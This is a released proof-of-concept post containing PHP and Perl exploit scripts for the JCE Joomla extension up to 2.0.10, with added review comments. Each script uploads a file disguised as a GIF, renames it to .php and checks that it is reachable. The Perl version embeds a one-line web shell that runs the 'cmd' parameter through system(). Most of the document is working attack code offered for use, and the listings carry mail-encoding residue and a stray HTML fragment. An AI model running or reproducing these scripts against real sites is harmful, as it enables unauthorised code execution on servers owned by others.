Related POC for JCE Joomla Extension <=2.0.10 Multiple
After the release of the vendor-supplied patch for JCE's vulnerabilities, AmnPardaz is going to release the related POC for this issue in Perl and PHP one month later, for educational purposes.
PHP Version:
<?php
######################################### www.bugreport.ir ########################################
#
# AmnPardaz Security Research & Penetration Testing Group
#
#
# Title: Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version
# Vendor: http://www.joomlacontenteditor.net
# Vulnerable Version: JCE 2.0.10 (prior versions also may be affected)
# Exploitation: Remote with browser
# Original Advisory: http://www.bugreport.ir/index_78.htm
# Vendor supplied patch: http://www.joomlacontenteditor.net/news/item/jce-2011-released
# CVSS2 Base Score: (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5
# Coded By: Mostafa Azizi
###################################################################################################
# NOTE(review): this listing is quoted-printable mail residue rather than
# runnable PHP: "=3D" stands for "=", "=09" for a tab, "=20" for a trailing
# space and a line-final "=" for a soft line break. The code lines below are
# reproduced byte-for-byte.
# Hosting-side setup: silence all PHP errors, lift the execution time limit,
# give socket operations a 2-second default timeout and flush output as it
# is produced.
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
# Input form: host, path, file, port and proxy are collected by POST and read
# by the handler further down in the file.
# NOTE(review): the form action is built from $SERVER[PHP_SELF] (sic). As
# written that is an undefined variable indexed by an undefined constant, so
# with error_reporting(0) the attribute is presumably empty; were it the
# intended $_SERVER['PHP_SELF'], a request-controlled value would be inlined
# into the HTML without htmlspecialchars().
echo'<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
</head>
<body bgcolor=3D"#00000">
<p align=3D"center"><font size=3D"4" color=3D"#00ff00">JCE Joomla Extension =
=20
Remote File Upload</font></p>
</font>
<table width=3D"90%">
<tbody>
<tr>
<td width=3D"43%" align=3D"left">
<form name=3D"form1" action=3D"'.$SERVER[PHP_SELF].'" =20
enctype=3D"multipart/form-data" method=3D"post">
<p></font><font color=3D"#00ff00" > hostname =20
(ex:www.sitename.com): </font><input name=3D"host" size=3D"20"> <span =20
class=3D"Stile5"><font color=3D"#FF0000">*</span></p>
<p></font><font color=3D"#00ff00" > path (ex: /joomla/ or =20
just / ): </font><input name=3D"path" size=3D"20"> <span =20
class=3D"Stile5"><font color=3D"#FF0000">*</span></p>
=09=09 <p></font><font color=3D"#00ff00" >Please specify a file to upload: =
=20
</font><input type=3D"file" name=3D"datafile" size=3D"40"><font =
=20
color=3D"#FF0000"> * </font>
<p><font color=3D"#00ff00" > specify a port (default is 80): =20
</font><input name=3D"port" size=3D"20"><span =20
class=3D"Stile5"></span></p>
<p><font color=3D"#00ff00" > Proxy (ip:port): =20
</font><input name=3D"proxy" size=3D"20"><span =20
class=3D"Stile5"></span></p>
<p align=3D"center"> <span class=3D"Stile5"><font =20
color=3D"#FF0000">* </font><font color=3D"white" >fields are =20
required</font></font></span></p>
<p><input type=3D"submit" value=3D"Start" name=3D"Submit"></p>
</form>
</td>
</tr>
</tbody>
</table>
</body></html>';
/**
 * Writes one raw HTTP request and optionally reads the reply into $html.
 *
 * Without $proxy the socket is opened to $host:$port; otherwise $proxy is
 * split on ':' and that endpoint is used instead. When $response is 1 the
 * reply is collected into the global $html (read to EOF directly; one byte
 * at a time through a proxy), and $output == 1 echoes it. When $s is 1 the
 * reply is scanned for the version strings listed in the body and the
 * script stops with "Target patched." on any hit.
 *
 * NOTE(review): the listing is quoted-printable mail residue (=3D is "=",
 * =09 a tab); code lines are kept byte-for-byte. $proxy_regex is assigned
 * but never used; $user and $pass are declared global but never read.
 * stream_set_timeout() is applied to $ock before the "if (!$ock)" check.
 * eregi() in the proxy read loop was removed in PHP 7, and that loop's
 * condition uses "or", so it only exits once the stream is at EOF and a
 * CRLFCRLF has been seen in $html. "$count = $count++" leaves $count
 * unchanged and "if ($count = 10)" is an assignment, so the closing message
 * is printed whenever no version string matched.
 */
function sendpacket($packet,$response =3D 0,$output =3D 0,$s=3D0)
{
=09$proxy_regex =3D '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
=09global $proxy, $host, $port, $html, $user, $pass;
    # Connect directly, or to the "ip:port" given in $proxy; both branches die
    # (with an HTML message) when fsockopen() returned false.
=09if ($proxy =3D=3D '')
=09{
=09=09$ock =3D fsockopen($host,$port);
=09=09stream_set_timeout($ock, 5);
=09=09if (!$ock)
=09=09{
=09=09=09echo '<font color=3Dwhite> No response from '.htmlentities($host).'=
=20
....<br></font>';
=09=09=09die;
=09=09}
=09} else
=09{
=09=09$parts =3D explode(':',$proxy);
=09=09echo '<font color=3Dwhite>Connecting to proxy: =20
'.$parts[0].':'.$parts[1].' ...<br><br/></font>';
=09=09$ock =3D fsockopen($parts[0],$parts[1]);
=09=09stream_set_timeout($ock, 5);
=09=09if (!$ock)
=09=09{
=09=09=09echo '<font color=3Dwhite>No response from proxy...<br></font>';
=09=09=09die;
=09=09}
=09}
    # Send the request; read the reply only when asked to.
=09=09fputs($ock,$packet);
=09=09if ($response =3D=3D 1)
=09=09{
=09=09=09if ($proxy =3D=3D '')
=09=09=09{
=09=09=09=09$html =3D '';
=09=09=09=09while (!feof($ock))
=09=09=09=09{
=09=09=09=09=09$html .=3D fgets($ock);
=09=09=09=09}
=09=09=09} else
=09=09=09{
=09=09=09=09$html =3D '';
=09=09=09=09while ((!feof($ock)) or =20
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
=09=09=09=09{
=09=09=09=09=09$html .=3D fread($ock,1);
=09=09=09=09}
=09=09=09}
=09=09} else $html =3D '';
=09=09fclose($ock);
=09=09if ($response =3D=3D 1 && $output =3D=3D 1) echo nl2br(htmlentities($h=
tml));
    # Version scan: each listed "<title>" fragment marks a release the author
    # treats as patched; the first match ends the script.
=09=09if ($s=3D=3D1){
=09=09$count=3D0;
=09=09$res=3Dnl2br(htmlentities($html));
=09=09$str =3D =20
array('2.0.11</title','2.0.12</title','2.0.13</title','2.0.14</titl=
e','2.0.15</title','1.5.7.10</title','1.5.7.11</title','1.5.7.12<=
;/title','1.5.7.13</title','1.5.7.14</title');
=09=09foreach ($str as $value){
=09=09$pos =3D strpos($res, $value);
=09=09if ($pos =3D=3D=3D false) {
=09=09$count=3D$count++;
=09=09} else {
=09=09echo "<font color=3Dwhite>Target patched.<br/><br/></font>";
=09=09die();
=09=09}
=09=09}
=09=09if ($count=3D10) echo '<font color=3Dwhite>Target is =20
exploitable.<br/><br/></font>';
=09=09}
}
# Request handler: the form fields are read unconditionally; the request
# sequence below runs only when Submit was pressed and host and path are
# non-empty.
# NOTE(review): the listing is quoted-printable mail residue (=3D is "=",
# =09 a tab, =20 a trailing space, line-final "=" a soft break); the code
# lines are reproduced byte-for-byte.
$host =3D $_POST['host'];
$path =3D $_POST['path'];
$port =3D $_POST['port'];
$proxy =3D $_POST['proxy'];
if (isset($_POST['Submit']) && $host !=3D '' && $path !=3D '')
{
# Port: intval() of the trimmed field, then "== ''" to fall back to 80. That
# fallback relies on the loose 0 == '' comparison, which is false on PHP 8.
# Path must start and end with '/'. With a proxy the request-target becomes
# an absolute URL (http://host:port/path).
$port=3Dintval(trim($port));
if ($port=3D=3D'') {$port=3D80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('<font =20
color=3Dwhite>Error... check the path!</font>');}
if ($proxy=3D=3D'') {$p=3D$path;} else {$p=3D'http://'.$host.':'.$port.$p=
ath;}
# Only CRLF pairs are stripped from host/path before they are placed in the
# request line and Host header; nothing else about the values is validated.
$host=3Dstr_replace("\r\n","",$host);
$path=3Dstr_replace("\r\n","",$path);
# Packet 1: GET of the imgmanager plugin page; sendpacket(..., $s = 1) scans
# the reply for the version strings of patched releases.
=09=09 =09=09=09=09=09=09=09=09=09/* Packet 1 --> Checking Exploitabil=
ity */
=09=09=09$packet =3D "GET =20
".$p."/index.php?option=3Dcom_jce&task=3Dplugin&plugin=3Dimgmanager&file=3Di=
mgmanager&version=3D1576&cid=3D20 =20
HTTP/1.1\r\n";
=09=09=09$packet .=3D "Host: ".$host."\r\n";
=09=09=09$packet .=3D "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";
=09=09=09sendpacket($packet,1,0,1);
# Packet 2: multipart POST to the imgmanager upload form. The upload body is
# "GIF89a1\n" followed by the bytes of the file chosen in the form, sent as
# "0day.gif" with Content-Type image/gif; no reply is read.
# NOTE(review): the multipart boundary, the User-Agent "BOT/0.1 (BOT for
# JCE)", the filename, the name=3Dvalue pair in the query string and the whole
# Cookie header (including the __utm* values) are constant across runs, so
# they are straightforward web-log / WAF match artifacts for defenders.
=09=09=09=09=09=09=09=09=09/* Packet 2 --> Uploading shell as a gif fil=
e */
=09=09=09$content =3D "GIF89a1\n";
=09=09=09$content .=3D file_get_contents($_FILES['datafile']['tmp_name']);
=09=09=09$data =3D "-----------------------------41184676334\r\n";
=09=09=09$data .=3D "Content-Disposition: form-data; name=3D\"upload-dir\"=
\r\n\r\n";
=09=09=09$data .=3D "/\r\n";
=09=09=09$data .=3D "-----------------------------41184676334\r\n";
=09=09=09$data .=3D "Content-Disposition: form-data; name=3D\"Filedata\"; =
=20
filename=3D\"\"\r\n";
=09=09=09$data .=3D "Content-Type: application/octet-stream\r\n\r\n\r\n";
=09=09=09$data .=3D "-----------------------------41184676334\r\n";
=09=09=09$data .=3D "Content-Disposition: form-data; =20
name=3D\"upload-overwrite\"\r\n\r\n";
=09=09=09$data .=3D "0\r\n";
=09=09=09$data .=3D "-----------------------------41184676334\r\n";
=09=09=09$data .=3D "Content-Disposition: form-data; name=3D\"Filedata\"; =
=20
filename=3D\"0day.gif\"\r\n";
=09=09=09$data .=3D "Content-Type: image/gif\r\n\r\n";
=09=09=09$data .=3D "$content\r\n";
=09=09=09$data .=3D "-----------------------------41184676334\r\n";
=09=09=09$data .=3D "0day\r\n";
=09=09=09$data .=3D "-----------------------------41184676334\r\n";
=09=09=09$data .=3D "Content-Disposition: form-data; name=3D\"action\"\r\n=
\r\n";
=09=09=09$data .=3D "upload\r\n";
=09=09=09$data .=3D "-----------------------------41184676334--\r\n\r\n\r\=
n\r\n";
=09=09=09$packet =3D "POST =20
".$p."/index.php?option=3Dcom_jce&task=3Dplugin&plugin=3Dimgmanager&file=3Di=
mgmanager&method=3Dform&cid=3D20&6bc427c8a7981f4fe1f5ac65c1246b5f=3D9d09f693=
c63c1988a9f8a564e0da7743 =20
HTTP/1.1\r\n";
=09=09=09$packet .=3D "Host: ".$host."\r\n";
=09=09=09$packet .=3D "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
=09=09=09$packet .=3D "Content-Type: multipart/form-data; =20
boundary=3D---------------------------41184676334\r\n";
=09=09=09$packet .=3D "Accept-Language: en-us,en;q=3D0.5\r\n";
=09=09=09$packet .=3D "Accept-Charset: ISO-8859-1,utf-8;q=3D0.7,*;q=3D0.7\r\=
n";
=09=09=09$packet .=3D "Cookie: =20
6bc427c8a7981f4fe1f5ac65c1246b5f=3D9d09f693c63c1988a9f8a564e0da7743; =20
jce_imgmanager_dir=3D%2F; =20
__utma=3D216871948.2116932307.1317632284.1317632284.1317632284.1; =20
__utmb=3D216871948.1.10.1317632284; __utmc=3D216871948; =20
__utmz=3D216871948.1317632284.1.1.utmcsr=3D(direct)|utmccn=3D(direct)|utmcmd=
=3D(none)\r\n";
=09=09=09$packet .=3D "Connection: Close\r\n";
=09=09=09$packet .=3D "Proxy-Connection: close\r\n";
=09=09=09$packet .=3D "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n";
=09=09=09$packet .=3D $data;
=09=09=09sendpacket($packet,0,0,0);
# Packet 3: POST with "X-Request: JSON" asking the plugin to rename
# /0day.gif to 0day.php (folderRename); the reply is read but not shown.
# NOTE(review): the Accept-Encoding line ends in a bare "\n" while every
# other header uses CRLF.
=09 =09=09=09=09=09=09=09=09=09/* Packet 3 --> Change Extension from .gif t=
o .php */
=09=09=09$packet =3D "POST =20
".$p."/index.php?option=3Dcom_jce&task=3Dplugin&plugin=3Dimgmanager&file=3Di=
mgmanager&version=3D1576&cid=3D20 =20
HTTP/1.1\r\n";
=09=09=09$packet .=3D "Host: ".$host."\r\n";
=09=09=09$packet .=3D "User-Agent: BOT/0.1 (BOT for JCE) \r\n";
=09=09=09$packet .=3D "Accept: =20
text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8\r\n";
=09=09=09$packet .=3D "Accept-Language: en-US,en;q=3D0.8\r\n";
=09=09=09$packet .=3D "Accept-Charset: ISO-8859-1,utf-8;q=3D0.7,*;q=3D0.7\r\=
n";
=09=09=09$packet .=3D "Content-Type: application/x-www-form-urlencoded; =20
charset=3Dutf-8\r\n";
=09=09=09$packet .=3D "Accept-Encoding: deflate\n";
=09=09=09$packet .=3D "X-Request: JSON\r\n";
=09=09=09$packet .=3D "Cookie: =20
__utma=3D216871948.2116932307.1317632284.1317639575.1317734968.3; =20
__utmz=3D216871948.1317632284.1.1.utmcsr=3D(direct)|utmccn=3D(direct)|utmcmd=
=3D(none); =20
__utmb=3D216871948.20.10.1317734968; __utmc=3D216871948; =20
jce_imgmanager_dir=3D%2F; =20
6bc427c8a7981f4fe1f5ac65c1246b5f=3D7df6350d464a1bb4205f84603b9af182\r\n";
=09=09=09$ren =20
=3D"json=3D{\"fn\":\"folderRename\",\"args\":[\"/0day.gif\",\"0day.php\"]}";
=09=09=09$packet .=3D "Content-Length: ".strlen($ren)."\r\n\r\n";
=09=09=09$packet .=3D $ren."\r\n\r\n";
=09=09=09sendpacket($packet,1,0,0);
# Packet 4: "Head" request (sic, mixed case) for /images/stories/0day.php.
# Success is judged by stristr($html, '200 OK') with a loose "!= true"
# comparison, so any non-empty match counts as success.
# NOTE(review): the stray '" rel="nofollow">' fragment in the success echo
# is HTML-rendering residue (an auto-linked URL) that leaked into the
# listing, not original code.
=09 =09=09=09=09=09=09=09=09=09/* Packet 4 --> Check for successfully uploa=
ded */
=09=09=09$packet =3D "Head ".$p."/images/stories/0day.php HTTP/1.1\r\n";
=09=09=09$packet .=3D "Host: ".$host."\r\n";
=09=09=09$packet .=3D "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";
=09=09=09sendpacket($packet,1,0,0);
if(stristr($html , '200 OK') !=3D true)
{echo "<font color=3Dwhite>Exploit Faild...</font>";} else echo =20
"<font color=3Dwhite>Exploit =20
Succeeded...<br>";" rel="nofollow">http://$host:$port$path"."/images/stories/0day.php</font>";
}
?>
Perl Version:
######################################### www.bugreport.ir ########################################
#
# AmnPardaz Security Research & Penetration Testing Group
#
#
# Title: Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - Perl Version
# Vendor: http://www.joomlacontenteditor.net
# Vulnerable Version: JCE 2.0.10 (prior versions also may be affected)
# Exploitation: Remote with browser
# Original Advisory: http://www.bugreport.ir/index_78.htm
# Vendor supplied patch: http://www.joomlacontenteditor.net/news/item/jce-2011-released
# CVSS2 Base Score: (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5
# Coded By: Mostafa Azizi
###################################################################################################
use IO::Socket;
use LWP::Simple;
# NOTE(review): like the PHP listing above, this is quoted-printable mail
# residue (=3D is "=", =09 a tab, =20 a trailing space, line-final "=" a soft
# break); the code lines are reproduced byte-for-byte.
# system("cls") clears the console on Windows only.
system("cls");
# Usage banner when no host argument is given.
if(!defined($ARGV[0])) {
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell =20
Uploader) V0.1 .::.\n\n";
print "\t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) =20
||||\n\n";
print "\t+--> Usage: perl $0 <host> <--+\n";
print "\t+--> Example: perl $0 localhost <--+\n\n";
exit; }
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell =20
Uploader) V0.1 .::.\n\n";
print "\t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) =20
||||\n\n";
# Fixed request pieces. $TARGET is taken verbatim from argv (no scheme;
# $HTTP is defined but never used), $PORT is fixed at 80, and $header1G /
# $header1H are defined but never sent.
$TARGET =3D $ARGV[0];
$PORT =3D "80";
$SCRIPT =3D =20
"/index.php?option=3Dcom_jce&task=3Dplugin&plugin=3Dimgmanager&file=3Dimgman=
ager&version=3D1576&cid=3D20";
$SHELL =3D "/images/stories/0day.php?cmd=3D";
$HTTP =3D "http://";
$header1G =3D "GET $SCRIPT HTTP/1.1";
$header1H =3D "HEAD /images/stories/0day.php HTTP/1.1";
$header1P =3D "POST =20
/index.php?option=3Dcom_jce&task=3Dplugin&plugin=3Dimgmanager&file=3Dimgmana=
ger&method=3Dform&cid=3D20&6bc427c8a7981f4fe1f5ac65c1246b5f=3Dcf6dd3cf1923c9=
50586d0dd595c8e20b =20
HTTP/1.1";
$header1P2 =3D "POST =20
/index.php?option=3Dcom_jce&task=3Dplugin&plugin=3Dimgmanager&file=3Dimgmana=
ger&version=3D1576&cid=3D20 =20
HTTP/1.1";
$header2 =3D "Host: $TARGET";
$header3 =3D "User-Agent: BOT/0.1 (BOT for JCE)";
# NOTE(review): Content-Length is hard-coded to 769 regardless of the body
# actually printed below. The boundary, User-Agent, filename and the
# name=3Dvalue pair in the POST target are constant across runs, so they are
# usable web-log / WAF match artifacts for defenders.
$header4 =3D "Content-Type: multipart/form-data; =20
boundary=3D---------------------------41184676334";
$header5 =3D "Content-Length: 769";
$header6 =3D "-----------------------------41184676334";
$header7 =3D 'Content-Disposition: form-data; name=3D"upload-dir"';
$header8 =3D '/';
$header9 =3D 'Content-Disposition: form-data; name=3D"Filedata"; filename=3D=
""';
$header10 =3D 'Content-Type: application/octet-stream';
$header11 =3D 'Content-Disposition: form-data; name=3D"upload-overwrite"';
$header12 =3D "0";
$header13 =3D 'Content-Disposition: form-data; name=3D"Filedata"; =20
filename=3D"0day.gif"';
$header14 =3D 'Content-Type: image/gif';
# $header15 and $header16 form the upload body: a GIF signature followed by a
# one-line PHP stub that passes the "cmd" query parameter to system().
$header15 =3D 'GIF89aG';
$header16 =3D "<? system(\$_GET['cmd']\);exit; ?>";
$header17 =3D 'Content-Disposition: form-data; name=3D"upload-name"';
$header18 =3D '0day';
$header19 =3D 'Content-Disposition: form-data; name=3D"action"';
$header20 =3D 'upload';
$header21 =3D "-----------------------------41184676334--";
$header22 =3D 'X-Request: JSON';
$header23 =3D 'Content-Type: application/x-www-form-urlencoded; charset=3Dut=
f-8';
$header25 =3D 'json=3D{"fn":"folderRename","args":["/0day.gif","0day.php"]}'=
;
$header24 =3D "Content-Length: ".length($header25)."";
# Packet 1: fetch the plugin page with LWP::Simple::get and look for the
# version strings of patched releases.
# NOTE(review): $pageURL is "$TARGET$SCRIPT" with no scheme, so unless the
# argument already carries one the fetch presumably fails and $simplePage is
# undef. The foreach has no break, so after one pass $count is 10 minus the
# number of matching patterns; the "$count==5" test below would therefore
# need five matches to print.
############################################### Packet 1 --> Checking =20
Exploitability #########################################################
print "\n[*] Checking Exploitability ...\n\n";
sleep 2;
$pageURL=3D$TARGET.$SCRIPT;
$simplePage=3Dget($pageURL);
@arr =3D =20
("2.0.11</title","2.0.12</title","2.0.13</title","2.0.14</title","2.0.15<=
/title","1.5.7.10</title","1.5.7.11</title","1.5.7.12</title","1.5.7.13</tit=
le","1.5.7.14</title");
while (($count!=3D10) && ($die !=3D 1)) {
=09foreach $arr(@arr){
=09=09if ($simplePage =3D~ m/$arr/) {
=09=09=09print "\n[*] Target patched.\n\n";
=09=09=09$die =3D 1;
=09=09} else {
=09=09=09$count++;
=09=09=09=09}
=09=09}
=09}
if ($count=3D=3D5) {print "[*] Target is exploitable.\n\n"};
# Packet 2: open a TCP socket and write the multipart upload with bare "\n"
# line endings; nothing is read back from this socket.
############################################### Packet 2 --> Uploading =20
shell as a gif file =20
#########################################################
$remote =3D IO::Socket::INET->new(Proto=3D>"tcp",PeerAddr=3D>"$TARGET" =20
,PeerPort=3D>"$PORT")
|| die "Can't connect to $TARGET";
print "[*] Trying to upload 0day.gif ...\n\n";
print $remote =20
"$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n=
$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header1=
2\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header=
17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n";
sleep 2;
# Packet 3: a second socket carries the JSON folderRename request; here the
# Content-Length ($header24) is computed from the actual body.
############################################### Packet 3 --> Change =20
Extension from .gif to .php =20
#########################################################
print "[*] Trying to change extension from .gif to .php ...\n\n";
$remote =3D IO::Socket::INET->new(Proto=3D>"tcp",PeerAddr=3D>"$TARGET" =20
,PeerPort=3D>"$PORT")
|| die "Can't connect to $TARGET";
print $remote =20
"$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header2=
5\n\n";
# Packet 4: the get($shellurl) result is immediately overwritten; the while
# loop reads the Packet 3 socket ($remote) line by line and reports success
# on a "200 OK" line, so it is the rename reply that is being checked, not
# a HEAD of the uploaded file ($header1H is never sent).
############################################### Packet 4 --> Check for =20
successfully uploaded =20
#########################################################
$shellurl=3D$TARGET.$SHELL;
$output=3Dget($shellurl);
while ($output =3D <$remote> ) {
if ($output =3D~ /200 OK/) {
print "[+] 0day.php was successfully uploaded\n\n";
print "[+] Path:".$TARGET.$SHELL."id\n";
}}